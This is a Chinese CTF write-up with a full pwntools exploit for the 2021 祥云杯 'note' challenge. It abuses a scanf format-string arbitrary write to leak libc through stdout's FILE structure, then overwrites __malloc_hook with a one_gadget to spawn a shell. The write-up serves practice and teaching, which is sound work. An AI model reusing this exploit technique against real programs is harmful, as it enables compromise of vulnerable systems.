2021 祥云杯 pwn-note
这是一道scanf任意读写的pwn题
漏洞点发生在上图（图片未随本文一起保留）。从下面的脚本看，say 功能的第一个输入被直接当作 scanf 的格式串使用，因此 `%N$s` 可以让 scanf 把第二个输入写到栈上第 N 个参数所指向的地址，这就是任意地址写。
在第一个图那里下个断点，查看栈时发现 %11$p 对应的位置存放着一个指向 _IO_2_1_stdout_ 的指针，这给了我们泄露 libc 的机会：用 `%11$s` 就能把脚本里的 p2 直接写进 stdout 的 FILE 结构（flags 改为 0xfbad1800，其后的 _IO_read_ptr/_IO_read_end/_IO_read_base 清零，再加上 %s 末尾补的 '\0'），之后 stdout 刷新时就会把缓冲区前面的 libc 指针一并打印出来。具体原理可以看其他师傅分析 stdout 泄露 libc 的文章。
拿到 libc 基址之后算出 one_gadget（ogg）的地址，再利用 scanf 的任意地址写把 __malloc_hook 覆盖为 one_gadget；最后触发一次 malloc（脚本末尾发送 '1'，即 add 功能）即可拿到 shell。
格式串偏移为 7。笔者是在 Ubuntu 20.04 自带的 glibc 2.31 上做的，one_gadget 的约束直接满足，不需要用 realloc 调整；用题目给的 libc 时，脚本里的 one_gadget 偏移要用 one_gadget 工具重新算，并且需要借助 realloc 调整一下（把 __malloc_hook 指向 realloc、__realloc_hook 设为 one_gadget）。
import sys

from pwn import *
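# log_level='debug' dumps every byte sent/received -- handy here because the
# libc leak is parsed out of raw program output.
context(arch='amd64', os='linux', log_level='debug')
file_name = './note'


def li(x):
    """Print the string `x` highlighted in orange (used for leaked addresses)."""
    print('\x1b[01;38;5;214m' + x + '\x1b[0m')


def ll(x):
    """Print the string `x` highlighted in red (used for warnings)."""
    print('\x1b[01;38;5;1m' + x + '\x1b[0m')


context.terminal = ['tmux', 'splitw', '-h']
# NOTE: despite the name, a non-zero `debug` selects the *remote* target and
# 0 runs the local binary.  Name kept so the rest of the script is unchanged.
debug = 0
if debug:
    # The original called remote() with no arguments, which raises TypeError
    # as soon as remote mode is selected.  Take the target from the command
    # line instead:  python3 <this script> HOST PORT
    if len(sys.argv) < 3:
        raise SystemExit('usage: python3 ' + sys.argv[0] + ' HOST PORT  (remote mode)')
    r = remote(sys.argv[1], int(sys.argv[2]))
else:
    r = process(file_name)
elf = ELF(file_name)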
def dbg():
    """Attach gdb to the target tube `r` (opens in the tmux split set in context.terminal)."""
    gdb.attach(r)
menu = 'choice:'  # prompt the program prints before reading a menu choice
def add(size, content):
    """Menu option 1: allocate a note of `size` bytes and fill it with `content`.

    `size` is sent as a decimal line; `content` is sent raw, without a
    trailing newline (sendafter), exactly like the original.
    """
    size_line = str(size)
    r.sendlineafter(menu, '1')
    r.sendlineafter('size: ', size_line)
    r.sendafter('content: ', content)
def show():
    """Menu option 3: ask the program to print the notes; output stays in the tube."""
    choice = '3'
    r.sendlineafter(menu, choice)
def say(note1, note2):
    """Menu option 2 -- the vulnerable path.

    Judging by how the script uses it, `note1` ends up as a scanf format
    string and `note2` is the data scanf then reads, so `note1 = b'%N$s'`
    stores `note2` at whatever address sits in scanf's N-th argument slot
    (arbitrary write).  `note1` is sent raw, `note2` with a newline; since
    %s stops at whitespace, `note2` must not contain bytes 0x09-0x0d or 0x20.
    """
    choice = '2'
    r.sendlineafter(menu, choice)
    r.sendafter('say ? ', note1)
    r.sendlineafter('? ', note2)
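# ---- stage 1: leak libc through _IO_2_1_stdout_ ------------------------------
# The writeup found a pointer to _IO_2_1_stdout_ at scanf argument slot 11, so
# the format "%11$s" makes scanf store p2 straight into the FILE struct:
# flags = 0xfbad1800, then three zero qwords over _IO_read_ptr/_IO_read_end/
# _IO_read_base.  %s also appends a NUL right after the 32 bytes (offset 0x20,
# _IO_write_base) -- that is the usual stdout-leak trick: the next flush writes
# out memory from before the real buffer, which holds libc pointers.
p1 = b'%11$s'
p2 = p64(0xfbad1800) + p64(0) * 3
say(p1, p2)
# The first 0x7f-terminated pointer in the dump is taken to be &_IO_2_1_stdin_
# (the original's assumption for this libc; check in gdb if the sanity check
# below fires).  Pointers are 6 significant bytes, padded back to 8.
_IO_2_1_stdin_ = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
li('_IO_2_1_stdin_ = ' + hex(_IO_2_1_stdin_))

# libc used for all offsets below.  Default is the local Ubuntu 20.04 glibc
# 2.31 the writeup was done on; point this at the challenge-provided libc for
# the real target -- the symbol offsets *and* the one_gadget offsets depend on it.
libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
libc = ELF(libc_path)
libc_base = _IO_2_1_stdin_ - libc.sym['_IO_2_1_stdin_']
li('libc_base = ' + hex(libc_base))
# libc is mmap'ed, so a correct base is page aligned.  Without this check a
# mis-parsed leak (a different pointer dumped first, or a libc mismatch) would
# just be written into __malloc_hook and crash the target.
if libc_base & 0xfff:
    ll('libc_base is not page aligned - leak/libc mismatch, aborting')
    raise RuntimeError('bad libc leak: ' + hex(libc_base))
malloc_hook = libc_base + libc.sym['__malloc_hook']
li('malloc_hook = ' + hex(malloc_hook))
# Unused on the local libc.  With the challenge libc the one_gadget
# constraints are not satisfied and the writeup says to go through realloc
# (__malloc_hook -> realloc, __realloc_hook -> one_gadget); it is computed
# here for that variant.
realloc_hook = libc_base + libc.sym['__realloc_hook']
li('realloc_hook = ' + hex(realloc_hook))

# ---- stage 2: __malloc_hook -> one_gadget -------------------------------------
# one_gadget offsets for the local glibc 2.31 build only; regenerate them with
# `one_gadget <libc>` for any other libc.  Index 1 is the one that worked here.
one = [0xe3afe, 0xe3b01, 0xe3b04]
one_gadget = libc_base + one[1]
# Format-string offset 7 (the writeup's "偏移为7") is the qword right after the
# first 8 bytes of the input buffer, so "%7$s" makes scanf write p4 to the
# address stored there, i.e. __malloc_hook.  'aaaa' pads "%7$s" to exactly
# 8 bytes so that p64(malloc_hook) lands in that slot.
p3 = b'%7$saaaa' + p64(malloc_hook)
# Caveat: %s stops at whitespace (0x09-0x0d, 0x20) and appends a NUL after the
# 8 written bytes, so an address containing such a byte would be truncated.
p4 = p64(one_gadget)
say(p3, p4)

# Any malloc() from now on runs the hook: menu choice 1 (add) allocates a note.
r.sendline('1')
r.interactive()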